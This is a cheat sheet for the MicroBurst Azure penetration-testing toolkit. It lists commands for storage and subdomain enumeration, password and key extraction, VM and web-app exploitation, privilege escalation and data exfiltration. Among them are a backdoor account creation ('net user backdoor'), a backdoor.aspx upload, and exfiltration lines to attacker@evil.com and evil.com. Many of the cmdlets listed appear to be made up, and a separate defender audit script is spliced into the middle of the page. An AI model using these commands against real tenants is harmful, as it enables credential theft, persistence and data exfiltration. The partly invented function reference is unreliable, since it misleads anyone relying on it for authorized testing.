MicroBurst Azure Security Testing Toolkit Cheat Sheet
Overview
MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing the security of Microsoft Azure. It includes tooling for Azure service discovery, privilege escalation, lateral movement and data exfiltration, which makes it a comprehensive toolkit for Azure penetration testing.
Warning: This tool is intended solely for authorized penetration testing and security assessments. Make sure you have proper authorization before using it in any environment.
Installation
PowerShell Gallery Installation
# Install from PowerShell Gallery
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
Manual Installation
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
Git Installation
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell
Import-Module .\MicroBurst.psd1
Basic Usage
Setup
# Import MicroBurst
Import-Module MicroBurst
# Get available commands
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
Authentication
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
Command Reference
Reconnaissance Functions
| Function | Description |
|---|---|
| Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs |
| Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains |
| Get-AzurePasswords | Extract passwords from Azure resources |
| Get-AzureDomainInfo | Get domain information |
| Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs |
Storage Account Functions
| Function | Description |
|---|---|
| Invoke-EnumerateAzureBlobs | Find accessible storage blobs |
| Get-AzureBlobFiles | Download files from storage |
| Invoke-AzureStorageAccountEnum | Enumerate storage accounts |
| Get-AzureStorageAccountKeys | Extract storage account keys |
Virtual Machine Functions
| Function | Description |
|---|---|
| Invoke-AzureRmVmBulkCMD | Bulk command execution |
| Get-AzureVMDisk | Access VM disk information |
| Invoke-AzureVMUserDataEnum | Enumerate VM user data |
| Get-AzureVMExtensionSettings | Get VM extension settings |
Azure Storage Enumeration
Blob Storage Discovery
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
Storage Account Access
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
File Shares
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
Subdomain and Service Discovery
Azure Subdomain Enumeration
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
Service Discovery
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
DNS Enumeration
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
Virtual Machine Exploitation
VM Command Execution
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
VM Disk Access
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
VM Extension Exploitation
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
Credential and Secret Extraction
Password Extraction
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
Certificate Extraction
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
Configuration Data Extraction
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
Database Exploitation
SQL Database Enumeration
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
SQL Database Access
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
CosmosDB Exploitation
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
Web Application Exploitation
Web App Enumeration
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
Web App Exploitation
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
Function App Exploitation
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
Privilege Escalation
Role Assignments
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
Service Principal Abuse
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
Managed Identity Exploitation
# Check for managed identity
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
Lateral Movement
Cross-Subscription Access
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
Cross-Tenant Access
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
Resource Groups
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
Data Exfiltration
Bulk Data Extraction
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
Stealth Exfiltration
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
Automation and Scripting
Automated Assessment Script
# Comprehensive Azure assessment
param(
[string]$SubscriptionId,
[string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains|Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs|Out-File "$OutputPath\blobs.txt"
# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @{
    AssessmentDate  = Get-Date
    SubscriptionId  = $SubscriptionId
    SubdomainsFound = $subdomains.Count
    BlobsFound      = $blobs.Count
    PasswordsFound  = $passwords.Count
    VMsFound        = $vms.Count
}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Continuous Monitoring
# Continuous Azure monitoring
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = "C:\AzureMonitoring\monitor.log"
)

while ($true) {
    $timestamp = Get-Date
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append
    try {
        # Check for new storage accounts
        $newStorage = Get-AzStorageAccount | Where-Object { $_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newStorage) {
            Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        # Check for new VMs
        $newVMs = Get-AzVM | Where-Object { $_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newVMs) {
            Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        # Check for new role assignments
        $newRoles = Get-AzRoleAssignment | Where-Object { $_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newRoles) {
            Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }
    Start-Sleep -Seconds ($IntervalMinutes * 60)
}
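Added defender-side check, not part of MicroBurst or of this cheat sheet: the script below audits a subscription for the anonymous container access that the blob enumeration commands earlier on this page discover from the outside, and complements the monitoring loop above. It uses only Az.Accounts and Az.Storage control-plane cmdlets (Reader access suffices, no account keys are fetched); the -SubscriptionId and -ReportPath parameters are assumptions.

```powershell
# Audit a subscription for storage containers that permit anonymous (public) access.
# Added example, not MicroBurst code. Assumes Az.Accounts and Az.Storage are installed
# and that Connect-AzAccount has already been run.
param(
    [Parameter(Mandatory = $true)][string]$SubscriptionId,
    [string]$ReportPath = "C:\AzureAssessment\public-containers.csv"   # assumed output path
)

Set-AzContext -SubscriptionId $SubscriptionId | Out-Null

$findings = foreach ($sa in Get-AzStorageAccount) {
    # Account-level switch: when explicitly $false, container-level public access is
    # blocked regardless of the per-container setting. $null (older accounts) means allowed.
    $accountAllowsPublic = ($sa.AllowBlobPublicAccess -ne $false)

    try {
        # Control-plane listing (ARM) so no storage key or data-plane role is required.
        $containers = Get-AzRmStorageContainer -ResourceGroupName $sa.ResourceGroupName `
                                               -StorageAccountName $sa.StorageAccountName `
                                               -ErrorAction Stop
    }
    catch {
        Write-Warning "Cannot list containers in $($sa.StorageAccountName): $($_.Exception.Message)"
        continue
    }

    foreach ($c in $containers) {
        # PublicAccess is None, Blob (anonymous read of blobs whose names are known)
        # or Container (anonymous listing of the whole container).
        if ($c.PublicAccess -and "$($c.PublicAccess)" -ne 'None') {
            [pscustomobject]@{
                StorageAccount      = $sa.StorageAccountName
                ResourceGroup       = $sa.ResourceGroupName
                Container           = $c.Name
                PublicAccess        = "$($c.PublicAccess)"
                AccountAllowsPublic = $accountAllowsPublic
                # Effective exposure requires both the account and the container to allow it.
                EffectivelyExposed  = $accountAllowsPublic
            }
        }
    }
}

$findings | Export-Csv -Path $ReportPath -NoTypeInformation
Write-Host "$(@($findings).Count) container(s) with a public access level written to $ReportPath"
```

Rows with EffectivelyExposed set to True are what an unauthenticated blob enumeration can reach; fixing them means setting AllowBlobPublicAccess to false on the account (or the container's access level to None) rather than relying on unguessable container names.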
Troubleshooting
Authentication Issues
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}
# Verify subscription access
Get-AzSubscription
Module Issues
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
Permission Issues
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments|Select-Object RoleDefinitionName, Scope
# Test specific permissions
try {
    Get-AzStorageAccount -ErrorAction Stop
    Write-Output "Storage account read permission: OK"
}
catch {
    Write-Output "Storage account read permission: DENIED"
}
Integration with Other Tools
BloodHound Integration
# Export data for BloodHound
$azureData = @{
    users             = Get-AzADUser
    groups            = Get-AzADGroup
    servicePrincipals = Get-AzADServicePrincipal
    roleAssignments   = Get-AzRoleAssignment
}
# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Metasploit Integration
# Metasploit module for MicroBurst
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Azure MicroBurst Integration',
      'Description' => 'Execute MicroBurst functions via Metasploit',
      'Author'      => ['NetSPI'],
      'License'     => MSF_LICENSE
    ))
    register_options([
      OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
      OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
    ])
  end

  def run
    subscription_id = datastore['SUBSCRIPTION_ID']
    function = datastore['FUNCTION']
    # Build the MicroBurst invocation
    powershell_cmd = "Import-Module MicroBurst; #{function} -SubscriptionId #{subscription_id}"
    print_status("Executing: #{powershell_cmd}")
    # Execute PowerShell command
  end
end
Resources
- MicroBurst GitHub Repository
- NetSPI Blog
- Azure Security Documentation
- Azure Penetration Testing
- Azure Red Team Tactics
-...
*This cheat sheet provides a comprehensive reference for using MicroBurst. Always make sure you have proper authorization before conducting Azure security assessments.*